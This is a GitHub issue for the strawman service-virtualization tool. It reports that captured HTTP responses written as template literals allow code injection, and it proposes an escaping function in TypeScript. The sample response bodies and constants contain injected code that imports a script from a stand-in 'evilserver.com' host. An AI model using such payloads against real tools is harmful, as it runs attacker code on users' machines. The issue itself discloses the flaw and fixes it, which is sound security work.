openformation / strawman

A Deno-based service virtualization solution

Add proper escaping to snapshot output

grebaldi opened this issue

The Problem

Imagine an HTTP Response that looks like this:

200 OK

content-type: text/plain
date: Fri, 18 Mar 2022 12:53:57 GMT

I'm just innocent text. But here's the twist:`;

console.log("Well, that's too bad. This code will immediately be executed as soon as this response was captured.");
await import("https://evilserver.com/evilscript.ts");
`

The occurrence of a backtick breaks the captured response and allows for arbitrary code execution inside the template file. The template file is being imported immediately after being captured, so malicious code would be executed before the user has a chance to react.

Another way to achieve arbitrary code execution would be the use of interpolation:

200 OK

content-type: text/plain
date: Fri, 18 Mar 2022 12:53:57 GMT

I'm another innocent text. But look what I can do: ${await import("https://evilserver.com/evilscript.ts")}

Anything inside ${...} would be executed immediately.

The Solution

We need to properly escape the responses when they're being written to the file system.

According to https://262.ecma-international.org/6.0/#sec-template-literal-lexical-components, we need to keep an eye on the character sequences ` and ${; if those are preceded by \, they are treated as ordinary text. (Please consider the specs more deeply to see if more ground needs to be covered here.)

The point at which this is needed lies in modules/strawman-core/infrastructure/fs/syncVirtualServiceTreeWithDirectory.ts. The escape mechanism, however, may live in a separate function.

Acceptance Criteria

  • When written to the filesystem every occurrence of ` inside a captured response has been escaped to \`
  • When written to the filesystem every occurrence of ${ inside a captured response has been escaped to \${
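The escaping described above, as an added example (not strawman's own code; the function names and the `export default` snapshot layout are assumptions). It goes one step beyond the acceptance criteria by escaping backslashes first, because a backslash already present in the captured text would otherwise cancel the escaping backslash put in front of a following ` or ${, and a stray `\n` or `\u` in the body would be reinterpreted by the template literal.

```typescript
// Escape a captured response so it can be embedded in a template literal
// without terminating it (`) or opening an interpolation (${).
// Order matters: existing backslashes must be doubled before the escaping
// backslashes for ` and ${ are added, or "a\`" would still break out.
export function escapeForTemplateLiteral(raw: string): string {
  return raw
    .replace(/\\/g, "\\\\")
    .replace(/`/g, "\\`")
    .replace(/\$\{/g, "\\${");
}

// Assumed snapshot module shape: the captured text as a default export.
export function renderSnapshotModule(raw: string): string {
  return `export default \`${escapeForTemplateLiteral(raw)}\`;`;
}

// Round-trip check: evaluating only the escaped literal must give back the
// original text. Used here to show the escaping is lossless; nothing in the
// captured body runs as code because every ` and ${ has been neutralised.
export function evaluatesBackTo(raw: string): boolean {
  const literal = "`" + escapeForTemplateLiteral(raw) + "`";
  const read = new Function(`return ${literal};`) as () => string;
  return read() === raw;
}

// Constructed samples modelled on the two bodies in the issue text.
export const CAPTURED_BREAKOUT =
  "I'm just innocent text. But here's the twist:`;\n" +
  'console.log("injected");\n' +
  'await import("https://evilserver.com/evilscript.ts");\n`';
export const CAPTURED_INTERPOLATION =
  'Look what I can do: ${await import("https://evilserver.com/evilscript.ts")}';
```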